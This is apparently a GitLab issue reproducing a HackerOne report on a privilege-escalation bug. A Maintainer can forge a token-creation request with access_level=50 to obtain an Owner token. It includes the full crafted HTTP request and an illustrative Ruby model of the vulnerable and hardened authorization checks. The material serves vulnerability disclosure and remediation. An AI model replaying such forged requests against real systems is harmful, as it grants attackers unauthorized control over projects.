Maintainer user can become owner of project
HackerOne report #1805549 by shubham_sohi
on 2022-12-14, assigned to @fvpotvin:
Report
Summary
I have found a way that can be used by a low-privileged user to become owner of a project.
NOTE:
You need a premium GitLab account to verify the issue.
Steps to reproduce
1. Login into admin account.
2. Go to https://gitlab.com/projects/new and click on create blank project and create a project with name P.
3. Now in project P go to Project Information > Members and invite user A with Maintainer role.
4. Now login into user A account.
5. In project P go to Settings > Access Tokens, here user A can create an access token.
6. But user A can only create access tokens for the Maintainer, Guest, Reporter and Developer roles and does not have permission to create an access token for the Owner role.
7. Now run the below request in user A account with group_name and project_P_name.

```http
POST /<-group_name->/<-project_P_name->/-/settings/access_tokens HTTP/2
Host: gitlab.com
Content-Length: 444
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Windows"
Origin: https://gitlab.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://gitlab.com
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: { REDACTED }
X-Csrf-Token: { REDACTED }

resource_access_token%5Bname%5D=ksjdf&resource_access_token%5Bexpires_at%5D=2023-01-13&resource_access_token%5Baccess_level%5D=50&resource_access_token%5Bscopes%5D%5B%5D=api&resource_access_token%5Bscopes%5D%5B%5D=read_api&resource_access_token%5Bscopes%5D%5B%5D=read_repository&resource_access_token%5Bscopes%5D%5B%5D=write_repository&resource_access_token%5Bscopes%5D%5B%5D=read_registry&resource_access_token%5Bscopes%5D%5B%5D=write_registry
```

8. In response you will get a new access token.
9. Now you can use this token to perform all actions in the project as admin.
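The root cause described in the steps above is a server-side authorization check that never compares the requested `access_level` against the caller's own level, so a Maintainer (40) can submit `access_level=50` (Owner) even though the UI dropdown hides that option. The following Ruby is an added example written for this page to illustrate that gap; it is not GitLab's code and the service shape is an assumption. The numeric levels (Guest 10, Reporter 20, Developer 30, Maintainer 40, Owner 50) are GitLab's real `Gitlab::Access` values, the form body is constructed to mirror the one in the report, and `vulnerable_allowed?`, `hardened_allowed?`, `handle_create` and `parse_token_params` are illustrative names.

```ruby
require 'cgi'

# Numeric access levels as used by GitLab (Gitlab::Access). The values are real;
# the checks below are an illustrative model written for this page, not GitLab code.
GUEST      = 10
REPORTER   = 20
DEVELOPER  = 30
MAINTAINER = 40
OWNER      = 50
LEVELS     = [GUEST, REPORTER, DEVELOPER, MAINTAINER, OWNER].freeze

# Constructed form body with the same shape as the request in the report:
# the caller asks for access_level=50 (Owner) even though the UI never offers it.
FORM_BODY = 'resource_access_token%5Bname%5D=ksjdf' \
            '&resource_access_token%5Bexpires_at%5D=2023-01-13' \
            '&resource_access_token%5Baccess_level%5D=50' \
            '&resource_access_token%5Bscopes%5D%5B%5D=api' \
            '&resource_access_token%5Bscopes%5D%5B%5D=read_api'

# Decode the urlencoded body into the fields the token-creation endpoint reads.
# CGI.parse unescapes both keys and values, so "%5B" becomes "[" in the keys.
def parse_token_params(body)
  params = CGI.parse(body)
  {
    name:         params['resource_access_token[name]'].first,
    expires_at:   params['resource_access_token[expires_at]'].first,
    access_level: params['resource_access_token[access_level]'].first.to_i,
    scopes:       params['resource_access_token[scopes][]']
  }
end

# Vulnerable authorization (assumed shape of the bug): the server only asks
# "may this caller create project access tokens at all?", which is true for any
# Maintainer, and trusts whatever access_level the client sent.
def vulnerable_allowed?(caller_level, requested_level)
  caller_level >= MAINTAINER
end

# Hardened authorization: the caller must be allowed to create tokens, the
# requested level must be a known level, and it must not exceed the caller's own.
# This is the server-side rule that hiding "Owner" in the UI dropdown cannot enforce.
def hardened_allowed?(caller_level, requested_level)
  return false unless caller_level >= MAINTAINER
  return false unless LEVELS.include?(requested_level)
  requested_level <= caller_level
end

# Simulate the endpoint: returns :created or :forbidden for a given caller and body.
def handle_create(caller_level, body, check: method(:hardened_allowed?))
  requested = parse_token_params(body)[:access_level]
  check.call(caller_level, requested) ? :created : :forbidden
end

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable, Maintainer asks for Owner: #{handle_create(MAINTAINER, FORM_BODY, check: method(:vulnerable_allowed?))}"
  puts "hardened,   Maintainer asks for Owner: #{handle_create(MAINTAINER, FORM_BODY)}"
  puts "hardened,   Owner asks for Owner:      #{handle_create(OWNER, FORM_BODY)}"
end
```

The point of the hardened check is that it is made on the server from the caller's stored membership, not from anything the client sends; a dropdown that omits Owner is a convenience, not a control, and any value that is only restricted client-side can be replayed with a proxy exactly as the report shows.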
Impact
Maintainer role user gets Owner privileges.
What is the expected correct behavior?
Maintainer role user should only be able to create access tokens for the Maintainer, Guest, Reporter and Developer roles.
Output of checks
This bug happens on GitLab.com
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: